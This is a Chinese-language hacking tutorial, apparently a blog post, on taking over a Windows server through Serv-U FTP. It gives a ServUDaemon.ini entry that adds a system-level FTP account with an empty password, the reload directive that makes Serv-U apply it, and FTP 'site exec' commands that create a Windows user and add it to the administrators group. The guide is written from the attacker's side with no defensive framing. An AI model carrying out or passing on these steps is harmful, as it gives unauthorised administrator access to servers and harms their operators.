前面讲过SERV-U弱口令提权服务器，这种方法只局限于serv-u的默认帐号密码没有修改的情况下来进行提权。

详细大家可以参考前面的文章 服务器提权之Serv-U弱口令提权

可是这种方法如果管理员修改了默认的帐号密码那么我们就没有办法来进一步进行提权了。

所以这篇文章主要就是针对serv-u的帐号密码被修改过后。来重新添加或者修改serv-u的帐号和密码。

但是这种方法现在已经不太好使了。因为需要满足一下条件。

serv-u目录文件有修改权限

需要知道Serv-u的路径 

默认路径C:Program FilesRhinoSoft.comServ-U

在的管理员的安全意识在逐渐的增强。对系统权限的设置也越来越严格了。

但是一样还是存在有很多这样的漏洞。就像 不是还有很多管理员密码是admin  123 这些么。。。 

我们需要修改serv-u目录下的ServUDaemon.ini文件 这是存储帐号密码的地方。 也相当于是serv-u的数据库把。。

找到 ServUDaemon.ini 里面这样类型的代码 然后进行添加或修改。

[USER=admin|1]
Password=7a57a5a743894a0e
HomeDir=D:
RelPaths=1
PasswordLastChange=1292736176
TimeOut=600
Access1=D:|RWAMELCDP

比如我们要添加一个帐号为123 密码为空的usev-u帐号就这样填写。

[USER=123|1]
Password=
HomeDir=c:
RelPaths=1
PasswordLastChange=1292736176
TimeOut=600

Maintenance=System  //权限类型多加一行指定新加帐号为系统管理员
Access1=c:|RWAMELCDP

然后就变成了。

[USER=admin|1]
Password=7a57a5a743894a0e
HomeDir=D:
RelPaths=1
PasswordLastChange=1292736176
TimeOut=600
Access1=D:|RWAMELCDP

[USER=123|1]
Password=
HomeDir=c:
RelPaths=1
PasswordLastChange=1292736176
TimeOut=600

Maintenance=System
Access1=c:|RWAMELCDP

ReloadSettings=True  //在修改ini文件后需加入此项,这时SERV-U会自动刷新配置文件并生效,此项随之消失.再有修改再次添加

记得修改后后还需要在[USER=admin|1]的后面一行加上 user2=123|0  意思的在原有帐号的基础上在添加一个帐号为123的用户。
全部完成后点击保存即可用现在的serv-u帐号来添加管理员帐号密码了。
Quote site exec net user heishou 123456 /add
 Quote site exec net localgroup administrators heishou /add
 200 EXEC command successful (TID=33). // 执行成功